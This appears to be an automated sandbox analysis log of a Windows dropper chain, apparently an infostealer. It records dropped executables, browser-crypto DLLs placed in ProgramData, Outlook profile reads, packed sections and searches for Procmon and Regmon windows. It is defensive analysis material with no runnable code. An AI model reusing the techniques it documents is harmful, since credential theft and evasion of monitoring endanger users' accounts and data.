Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: winmm.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: wininet.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: mstask.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: mpr.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: dui70.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: duser.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: chartv.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: oleacc.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: winsta.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: textshaping.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: edputil.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: appresolver.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: slc.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: sppc.dll
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: ElmEHL9kP9.exe Static file information: File size 1833984 > 1048576
Source: ElmEHL9kP9.exe Static PE information: Raw size of gcovadtk is bigger than: 0x100000 < 0x195c00
Source: Binary string: mozglue.pdbP source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2498637724.000000006D5AD000.00000002.00000001.01000000.0000000E.sdmp, mozglue[1].dll.6.dr, mozglue.dll.6.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.6.dr, freebl3[1].dll.6.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.6.dr, freebl3[1].dll.6.dr
Source: Binary string: nss3.pdb@ source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2496708926.000000006CC9F000.00000002.00000001.01000000.0000000D.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr
Source: Binary string: softokn3.pdb@ source: softokn3.dll.6.dr, softokn3[1].dll.6.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.6.dr, vcruntime140[1].dll.6.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.6.dr, msvcp140.dll.6.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 5TWLADXGMSKDNXXRW4MQ8.exe, 00000003.00000002.1952631058.0000000000712000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: nss3.pdb source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2496708926.000000006CC9F000.00000002.00000001.01000000.0000000D.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr
Source: Binary string: mozglue.pdb source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2498637724.000000006D5AD000.00000002.00000001.01000000.0000000E.sdmp, mozglue[1].dll.6.dr, mozglue.dll.6.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.6.dr, softokn3[1].dll.6.dr

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Unpacked PE file: 3.2.5TWLADXGMSKDNXXRW4MQ8.exe.710000.0.unpack :EW;.rsrc:W;.idata :W;rslqcjii:EW;nrgaezht:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Unpacked PE file: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W;ewvvnzez:EW;dtrtedqc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ewvvnzez:EW;dtrtedqc:EW;.taggant:EW;
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Unpacked PE file: 18.2.BFCGDAAKFH.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W;gxsnorfr:EW;rtofmdfy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;gxsnorfr:EW;rtofmdfy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 20.2.skotes.exe.e50000.0.unpack :EW;.rsrc:W;.idata :W;gxsnorfr:EW;rtofmdfy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;gxsnorfr:EW;rtofmdfy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 21.2.skotes.exe.e50000.0.unpack :EW;.rsrc:W;.idata :W;gxsnorfr:EW;rtofmdfy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;gxsnorfr:EW;rtofmdfy:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: BFCGDAAKFH.exe.6.dr Static PE information: real checksum: 0x31f2e6 should be: 0x322dd7
Source: random[1].exe.6.dr Static PE information: real checksum: 0x31f2e6 should be: 0x322dd7
Source: ElmEHL9kP9.exe Static PE information: real checksum: 0x1ce1da should be: 0x1ca94c
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.0.dr Static PE information: real checksum: 0x4ffe9c should be: 0x509032
Source: skotes.exe.18.dr Static PE information: real checksum: 0x31f2e6 should be: 0x322dd7
Source: 5TWLADXGMSKDNXXRW4MQ8.exe.0.dr Static PE information: real checksum: 0x2b1fdb should be: 0x2ae2d7
Source: ElmEHL9kP9.exe Static PE information: section name:
Source: ElmEHL9kP9.exe Static PE information: section name: .idata
Source: ElmEHL9kP9.exe Static PE information: section name:
Source: ElmEHL9kP9.exe Static PE information: section name: gcovadtk
Source: ElmEHL9kP9.exe Static PE information: section name: vbsusyhj
Source: ElmEHL9kP9.exe Static PE information: section name: .taggant
Source: 5TWLADXGMSKDNXXRW4MQ8.exe.0.dr Static PE information: section name:
Source: 5TWLADXGMSKDNXXRW4MQ8.exe.0.dr Static PE information: section name: .idata
Source: 5TWLADXGMSKDNXXRW4MQ8.exe.0.dr Static PE information: section name: rslqcjii
Source: 5TWLADXGMSKDNXXRW4MQ8.exe.0.dr Static PE information: section name: nrgaezht
Source: 5TWLADXGMSKDNXXRW4MQ8.exe.0.dr Static PE information: section name: .taggant
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.0.dr Static PE information: section name:
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.0.dr Static PE information: section name: .idata
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.0.dr Static PE information: section name: ewvvnzez
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.0.dr Static PE information: section name: dtrtedqc
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.0.dr Static PE information: section name: .taggant
Source: msvcp140.dll.6.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.6.dr Static PE information: section name: .didat
Source: nss3.dll.6.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.6.dr Static PE information: section name: .00cfg
Source: softokn3.dll.6.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.6.dr Static PE information: section name: .00cfg
Source: BFCGDAAKFH.exe.6.dr Static PE information: section name:
Source: BFCGDAAKFH.exe.6.dr Static PE information: section name: .idata
Source: BFCGDAAKFH.exe.6.dr Static PE information: section name: gxsnorfr
Source: BFCGDAAKFH.exe.6.dr Static PE information: section name: rtofmdfy
Source: BFCGDAAKFH.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name: gxsnorfr
Source: random[1].exe.6.dr Static PE information: section name: rtofmdfy
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: freebl3.dll.6.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.6.dr Static PE information: section name: .00cfg
Source: mozglue.dll.6.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.6.dr Static PE information: section name: .00cfg
Source: skotes.exe.18.dr Static PE information: section name:
Source: skotes.exe.18.dr Static PE information: section name: .idata
Source: skotes.exe.18.dr Static PE information: section name: gxsnorfr
Source: skotes.exe.18.dr Static PE information: section name: rtofmdfy
Source: skotes.exe.18.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB98 push eax; retf 0_3_010AEB9D
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB98 push eax; retf 0_3_010AEB9D
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB98 push eax; retf 0_3_010AEB9D
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB9E push cs; retf 0_3_010AEBA1
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB9E push cs; retf 0_3_010AEBA1
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB9E push cs; retf 0_3_010AEBA1
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB98 push eax; retf 0_3_010AEB9D
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB98 push eax; retf 0_3_010AEB9D
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB98 push eax; retf 0_3_010AEB9D
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB9E push cs; retf 0_3_010AEBA1
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB9E push cs; retf 0_3_010AEBA1
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB9E push cs; retf 0_3_010AEBA1
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB98 push eax; retf 0_3_010AEB9D
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB98 push eax; retf 0_3_010AEB9D
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB98 push eax; retf 0_3_010AEB9D
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB9E push cs; retf 0_3_010AEBA1
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB9E push cs; retf 0_3_010AEBA1
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Code function: 0_3_010AEB9E push cs; retf 0_3_010AEBA1
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_0088C4EB push ebp; mov dword ptr [esp], 4EDFB530h 3_2_0088C50B
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_0088C4EB push edi; mov dword ptr [esp], 6EB65940h 3_2_0088C55F
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_0088C4EB push ebx; mov dword ptr [esp], 36BB23E2h 3_2_0088C57E
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_0088C4EB push 26ADDAF3h; mov dword ptr [esp], ecx 3_2_0088C5D1
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_0088C4EB push 6903837Eh; mov dword ptr [esp], esi 3_2_0088C614
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_0088C631 push esi; mov dword ptr [esp], 3AE1132Dh 3_2_0088C687
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_0088C631 push eax; mov dword ptr [esp], edx 3_2_0088C6A2
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_0088C631 push 308EC422h; mov dword ptr [esp], ebx 3_2_0088C6E3
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_0088C631 push edi; mov dword ptr [esp], edx 3_2_0088C722
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_0088C631 push edi; mov dword ptr [esp], ebx 3_2_0088C786
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_008B20AC push ebp; ret 3_2_008B20BB
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_00722058 push ecx; mov dword ptr [esp], ebx 3_2_00722059
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_00722058 push esi; mov dword ptr [esp], edx 3_2_0072310F
Source: ElmEHL9kP9.exe Static PE information: section name: entropy: 7.984427217524425
Source: ElmEHL9kP9.exe Static PE information: section name: gcovadtk entropy: 7.954565906490776
Source: BFCGDAAKFH.exe.6.dr Static PE information: section name: entropy: 7.0901740873362735
Source: random[1].exe.6.dr Static PE information: section name: entropy: 7.0901740873362735
Source: skotes.exe.18.dr Static PE information: section name: entropy: 7.0901740873362735

Persistence and Installation Behavior

barindex
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\Users\user\Documents\BFCGDAAKFH.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\Users\user\Documents\BFCGDAAKFH.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\random[1].exe Jump to dropped file
Source: C:\Users\user\Documents\BFCGDAAKFH.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File created: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Jump to dropped file
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File created: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival

barindex
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
